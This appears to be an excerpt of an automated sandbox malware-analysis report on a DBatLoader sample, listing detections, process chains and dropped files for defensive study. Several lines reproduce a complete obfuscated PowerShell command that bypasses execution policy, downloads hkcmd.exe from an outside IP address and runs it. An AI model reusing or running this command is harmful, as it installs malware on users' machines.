                    Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: jy7dhEfPtuBr.exe, 0000000D.00000000.1127732632.00000000006DF000.00000002.00000001.01000000.0000000F.sdmp

                    Data Obfuscation

                    barindex
                    Yara detected DBatLoader
                    Source: Yara matchFile source: 6.2.hkcmd.exe.20f6178.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.hkcmd.exe.2f30000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.hkcmd.exe.20f6178.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.980236899.00000000020F6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    PowerShell case anomaly found
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWERsHElL -ex BYPass -nop -W 1 -c DEVicecrEdeNtiAldePlOYMEnt.eXe ; IEX($(IEx('[sYSteM.TEXT.EnCoDinG]'+[chAR]0X3a+[chAr]0X3A+'UTf8.GeTsTRInG([SYSTEm.cONVErt]'+[chAR]58+[ChAr]0X3a+'fromBaSE64StrIng('+[ChAR]0x22+'JDdWdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRXJkRWZpTkl0SW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV0SFUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQUVoU0FyY1hldkYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1veixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqTG1IbGJtbGEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJvVU9WcWltYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWRaUlFiVWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDdWdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjI2LjE0My80NDAvaGtjbWQuZXhlIiwiJEVOdjpBUFBEQVRBXGhrY21kLmV4ZSIsMCwwKTtTdEFSdC1TTEVlcCgzKTtJblZvS2UtSVRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcaGtjbWQuZXhlIg=='+[ChAr]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWERsHElL -ex BYPass -nop -W 1 -c DEVicecrEdeNtiAldePlOYMEnt.eXe ; IEX($(IEx('[sYSteM.TEXT.EnCoDinG]'+[chAR]0X3a+[chAr]0X3A+'UTf8.GeTsTRInG([SYSTEm.cONVErt]'+[chAR]58+[ChAr]0X3a+'fromBaSE64StrIng('+[ChAR]0x22+'JDdWdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRXJkRWZpTkl0SW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV0SFUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQUVoU0FyY1hldkYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1veixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqTG1IbGJtbGEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJvVU9WcWltYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWRaUlFiVWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDdWdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjI2LjE0My80NDAvaGtjbWQuZXhlIiwiJEVOdjpBUFBEQVRBXGhrY21kLmV4ZSIsMCwwKTtTdEFSdC1TTEVlcCgzKTtJblZvS2UtSVRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcaGtjbWQuZXhlIg=='+[ChAr]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWERsHElL -ex BYPass -nop -W 1 -c DEVicecrEdeNtiAldePlOYMEnt.eXe ; IEX($(IEx('[sYSteM.TEXT.EnCoDinG]'+[chAR]0X3a+[chAr]0X3A+'UTf8.GeTsTRInG([SYSTEm.cONVErt]'+[chAR]58+[ChAr]0X3a+'fromBaSE64StrIng('+[ChAR]0x22+'JDdWdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRXJkRWZpTkl0SW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV0SFUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQUVoU0FyY1hldkYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1veixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqTG1IbGJtbGEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJvVU9WcWltYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWRaUlFiVWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDdWdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjI2LjE0My80NDAvaGtjbWQuZXhlIiwiJEVOdjpBUFBEQVRBXGhrY21kLmV4ZSIsMCwwKTtTdEFSdC1TTEVlcCgzKTtJblZvS2UtSVRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcaGtjbWQuZXhlIg=='+[ChAr]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWERsHElL -ex BYPass -nop -W 1 -c DEVicecrEdeNtiAldePlOYMEnt.eXe ; IEX($(IEx('[sYSteM.TEXT.EnCoDinG]'+[chAR]0X3a+[chAr]0X3A+'UTf8.GeTsTRInG([SYSTEm.cONVErt]'+[chAR]58+[ChAr]0X3a+'fromBaSE64StrIng('+[ChAR]0x22+'JDdWdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRXJkRWZpTkl0SW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV0SFUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQUVoU0FyY1hldkYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1veixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqTG1IbGJtbGEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJvVU9WcWltYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWRaUlFiVWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDdWdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjI2LjE0My80NDAvaGtjbWQuZXhlIiwiJEVOdjpBUFBEQVRBXGhrY21kLmV4ZSIsMCwwKTtTdEFSdC1TTEVlcCgzKTtJblZvS2UtSVRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcaGtjbWQuZXhlIg=='+[ChAr]0X22+'))')))"Jump to behavior
                    Suspicious command line found
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C poWERsHElL -ex BYPass -nop -W 1 -c DEVicecrEdeNtiAldePlOYMEnt.eXe ; IEX($(IEx('[sYSteM.TEXT.EnCoDinG]'+[chAR]0X3a+[chAr]0X3A+'UTf8.GeTsTRInG([SYSTEm.cONVErt]'+[chAR]58+[ChAr]0X3a+'fromBaSE64StrIng('+[ChAR]0x22+'JDdWdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRXJkRWZpTkl0SW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV0SFUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQUVoU0FyY1hldkYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1veixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqTG1IbGJtbGEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJvVU9WcWltYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWRaUlFiVWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDdWdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjI2LjE0My80NDAvaGtjbWQuZXhlIiwiJEVOdjpBUFBEQVRBXGhrY21kLmV4ZSIsMCwwKTtTdEFSdC1TTEVlcCgzKTtJblZvS2UtSVRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcaGtjbWQuZXhlIg=='+[ChAr]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C poWERsHElL -ex BYPass -nop -W 1 -c DEVicecrEdeNtiAldePlOYMEnt.eXe ; IEX($(IEx('[sYSteM.TEXT.EnCoDinG]'+[chAR]0X3a+[chAr]0X3A+'UTf8.GeTsTRInG([SYSTEm.cONVErt]'+[chAR]58+[ChAr]0X3a+'fromBaSE64StrIng('+[ChAR]0x22+'JDdWdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRXJkRWZpTkl0SW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV0SFUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQUVoU0FyY1hldkYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1veixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqTG1IbGJtbGEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJvVU9WcWltYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWRaUlFiVWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDdWdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjI2LjE0My80NDAvaGtjbWQuZXhlIiwiJEVOdjpBUFBEQVRBXGhrY21kLmV4ZSIsMCwwKTtTdEFSdC1TTEVlcCgzKTtJblZvS2UtSVRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcaGtjbWQuZXhlIg=='+[ChAr]0X22+'))')))"Jump to behavior
                    Suspicious powershell command line found
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWERsHElL -ex BYPass -nop -W 1 -c DEVicecrEdeNtiAldePlOYMEnt.eXe ; IEX($(IEx('[sYSteM.TEXT.EnCoDinG]'+[chAR]0X3a+[chAr]0X3A+'UTf8.GeTsTRInG([SYSTEm.cONVErt]'+[chAR]58+[ChAr]0X3a+'fromBaSE64StrIng('+[ChAR]0x22+'JDdWdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRXJkRWZpTkl0SW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV0SFUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQUVoU0FyY1hldkYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1veixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqTG1IbGJtbGEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJvVU9WcWltYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWRaUlFiVWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDdWdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjI2LjE0My80NDAvaGtjbWQuZXhlIiwiJEVOdjpBUFBEQVRBXGhrY21kLmV4ZSIsMCwwKTtTdEFSdC1TTEVlcCgzKTtJblZvS2UtSVRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcaGtjbWQuZXhlIg=='+[ChAr]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWERsHElL -ex BYPass -nop -W 1 -c DEVicecrEdeNtiAldePlOYMEnt.eXe ; IEX($(IEx('[sYSteM.TEXT.EnCoDinG]'+[chAR]0X3a+[chAr]0X3A+'UTf8.GeTsTRInG([SYSTEm.cONVErt]'+[chAR]58+[ChAr]0X3a+'fromBaSE64StrIng('+[ChAR]0x22+'JDdWdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRXJkRWZpTkl0SW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV0SFUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQUVoU0FyY1hldkYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1veixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqTG1IbGJtbGEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJvVU9WcWltYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWRaUlFiVWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDdWdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjI2LjE0My80NDAvaGtjbWQuZXhlIiwiJEVOdjpBUFBEQVRBXGhrY21kLmV4ZSIsMCwwKTtTdEFSdC1TTEVlcCgzKTtJblZvS2UtSVRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcaGtjbWQuZXhlIg=='+[ChAr]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4jbortuo\4jbortuo.cmdline"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4jbortuo\4jbortuo.cmdline"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F43F9C LoadLibraryW,GetProcAddress,WriteProcessMemory,FreeLibrary,6_2_02F43F9C
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_0512429B push ebx; ret 3_2_051242DA
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F572AC push 02F57317h; ret 6_2_02F5730F
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F33210 push eax; ret 6_2_02F3324C
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F4539C push 02F453D4h; ret 6_2_02F453CC
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F3C39A push 02F3C7F2h; ret 6_2_02F3C7EA
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F36350 push 02F36392h; ret 6_2_02F3638A
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F3634E push 02F36392h; ret 6_2_02F3638A
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F430B0 push 02F4315Bh; ret 6_2_02F43153
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F570AC push 02F57125h; ret 6_2_02F5711D
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F430AE push 02F4315Bh; ret 6_2_02F43153
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F571F8 push 02F57288h; ret 6_2_02F57280
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F57144 push 02F571ECh; ret 6_2_02F571E4
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F44100 push 02F44138h; ret 6_2_02F44130
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F3F6C8 push 02F3F73Eh; ret 6_2_02F3F736
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F3C66C push 02F3C7F2h; ret 6_2_02F3C7EA
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F3F7D3 push 02F3F821h; ret 6_2_02F3F819
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F3F7D4 push 02F3F821h; ret 6_2_02F3F819
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F47484 push 02F474BCh; ret 6_2_02F474B4
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F425E4 push ecx; mov dword ptr [esp], edx6_2_02F425E6
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F4AA64 push ecx; mov dword ptr [esp], edx6_2_02F4AA69
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F4AA00 push ecx; mov dword ptr [esp], edx6_2_02F4AA05
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F43EBC push 02F43EFEh; ret 6_2_02F43EF6
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F3BFEC push ecx; mov dword ptr [esp], edx6_2_02F3BFF1
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F3CFB4 push 02F3CFE0h; ret 6_2_02F3CFD8
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F35F82 push 02F35FDFh; ret 6_2_02F35FD7
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F35F84 push 02F35FDFh; ret 6_2_02F35FD7
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F55DF4 push 02F55FEEh; ret 6_2_02F55FE6
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_2C4D09AD push ecx; mov dword ptr [esp], ecx11_2_2C4D09B6
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_073A1669 pushfd ; retf 11_2_073A166D
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_073A14C8 pushfd ; retf 11_2_073A14CC
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_073B3393 push eax; ret 11_2_073B33DA
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\hkcmd[1].exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\4jbortuo\4jbortuo.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\hkcmd.exeJump to dropped file

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F478FC GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_02F478FC
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
